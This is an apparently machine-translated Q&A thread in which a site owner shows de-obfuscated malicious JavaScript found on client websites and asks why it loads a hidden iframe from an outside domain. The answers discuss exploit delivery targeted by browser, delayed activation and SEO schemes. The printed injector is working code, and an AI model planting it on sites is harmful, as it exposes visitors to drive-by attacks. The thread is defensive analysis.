Question

我最近在我的一些客戶網站上發現了一些惡意代碼。這些片段基於PHP和基於JS的注入，因爲特洛伊病毒記錄了一些ftp憑證。但是，代碼混淆了和我eval'd它（安全），它看起來像這樣：

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src','http://www.bahnmotive.de/index.htm'); 
    f.style.visibility='hidden'; 
    f.style.position='absolute'; 
    f.style.left='0'; 
    f.style.top='0'; 
    f.setAttribute('width','10'); 
    f.setAttribute('height','10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 

正如你所看到的，URL bahnmotive.de包括在頁面中的iframe無形。本網站不包含任何有害數據（至少現在不再），所以我問自己（和你）：爲什麼有人要鏈接到一個隱形iframe的網站，而不是做一些其他的惡事？我的第一個猜測是，有一個SEO代理商承諾在他們的客戶網站bahnmotive.de上有很多流量，並且由於這種木馬病毒而實現了這一點。 這可能嗎？我在Google做了一項研究，但沒有發現任何關於這方面的信息，所以我想問一些專家在這裏。也許你可以把我指向另一個論壇，討論這個話題。

Answer 1

這很可能是網頁被嗅探HTTP_REFERER，以確保用戶從一個鏈接來爲了掩蓋從其他外部人員的攻擊。

其他注意事項：

• 它的休眠狀態，等待另一次激活
• 它是一個SEO建設者，如你所說，增加外部鏈接數
• 該網站是目前活躍和做（可能已經覆蓋了它的軌道，或者它可能針對不同的瀏覽器）
• 有人試圖做壞事，但失敗了

Answer 2

用戶代理和插件存在可能在該URL被檢查，只有漏洞利用發送給用戶與瀏覽器脆弱。

不要低估壞人。

Answer 3

的攻擊可能是：

• 有時間限制：設置在未來某個時間被激活。在此之前，他們可以通過記錄地址來評估感染傳播
• 時間限制：確實有感染，但現在已經清除。這仍然是再次作爲一個攻擊者可以放在該服務器上的惡意軟件風險的未來
• 特定瀏覽器：作爲@kirilloid指出，很容易檢查特定瀏覽器的簽名和唯一的服務器的惡意軟件，以配合

該瀏覽器

它可能不是一個利用 - 正如你在問題中提到它可能是一個推動流量的SEO方案。這可能不會對你產生任何惡意影響，但仍然是一種妥協方式，JS應該根據以上三種可能性進行清理。

Answer 4

這可能提交也已經掃描了哪些網站未正確驗證字符串數據。這些信息隨後可以像其他人所說的那樣在以後的實際攻擊中使用。